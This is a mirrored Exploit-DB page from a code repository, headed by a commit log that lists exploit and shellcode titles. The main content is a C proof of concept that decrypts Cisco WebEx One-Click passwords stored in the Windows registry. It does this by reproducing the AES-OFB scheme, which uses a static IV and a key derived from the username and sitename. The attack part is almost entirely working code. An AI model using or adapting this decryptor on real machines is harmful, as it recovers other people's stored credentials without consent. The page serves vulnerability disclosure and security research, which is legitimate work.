bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/38668.c
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

118 lines
No EOL
3.2 KiB
C
Raw Blame History

// source: https://www.securityfocus.com/bid/61304/info
Cisco WebEx One-Click Client is prone to an information disclosure vulnerability.
Successful exploits may allow an attacker to disclose sensitive information such as stored passwords; this may aid in further attacks.
/*
WebEx One-Click Registry Key Decryptor
brad.antoniewicz@foundstone.coma
compile with gcc -o webex-onedecrypt -lssl webex-onedecrypt.c
Thanks to https://code.google.com/p/tps-cripto-itba/source/browse/trunk/src/criptography
for making life easy
see comments below
*/
#include <openssl/aes.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
unsigned char *
aes_ofb_encrypt(unsigned char * text, int length, unsigned char * key, unsigned char * iv)
{
unsigned char * outbuf = calloc(1,length);
int num = 0;
unsigned char liv[16];
memcpy(liv,iv,16);
AES_KEY aeskey;
//memset(outbuf, 0, 8);
AES_set_encrypt_key(key, 256, &aeskey);
AES_ofb128_encrypt(text, outbuf, length, &aeskey, liv, &num);
return outbuf;
}
unsigned char *
aes_ofb_decrypt(unsigned char * enc, int length, unsigned char * key, unsigned char * iv)
{
unsigned char * outbuf= calloc(1,length);
int num = 0;
unsigned char liv[16];
memcpy(liv,iv,16);
AES_KEY aeskey;
AES_set_encrypt_key(key, 256, &aeskey);
AES_ofb128_encrypt(enc, outbuf, length, &aeskey, liv, &num);
return outbuf;
}
void main() {
/*
This value is from
HKEY_CURRENT_USER\Software\WebEx\ProdTools\Password
*/
unsigned char * regVal = "\xcc\x6d\xc9\x3b\xa0\xcc\x4c\x76\x55\xc9\x3b\x9f";
/*
This value is from
HKEY_CURRENT_USER\Software\WebEx\ProdTools\PasswordLen
*/
int regLength = 12;
/*
This value is a combination of these two registry keys:
HKEY_CURRENT_USER\Software\WebEx\ProdTools\UserName
HKEY_CURRENT_USER\Software\WebEx\ProdTools\SiteName
Basicaly the username and the sitename padding to 32 characters, if the
two dont add up to 32 characters, its just repeated until it fits
*/
unsigned char key[32] = "braantonsiteaa.webex.com/siteaab";
/*
The IV is static, particularly complex value of 123456789abcdef....
*/
unsigned char iv[16] = { 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12 };
/*
These are just for testing, you'd probably not have the password :)
*/
unsigned char * password = "bradbradbrad";
int pwLength = strlen((char *)password);
unsigned char * enc = NULL;
unsigned char * enc2 = NULL;
int i = 0;
printf("Reg Key Value = ");
enc = aes_ofb_encrypt(password, pwLength, key, iv);
for(i=0;i<pwLength;i++) {
printf("%02x ", enc[i]);
}
printf("\n");
printf("Password = ");
enc2 = aes_ofb_decrypt(regVal, regLength, key, iv);
for(i=0;i<regLength;i++) {
printf("%c", enc2[i]);
}
printf("\n");
}
Reference in a new issue View git blame Copy permalink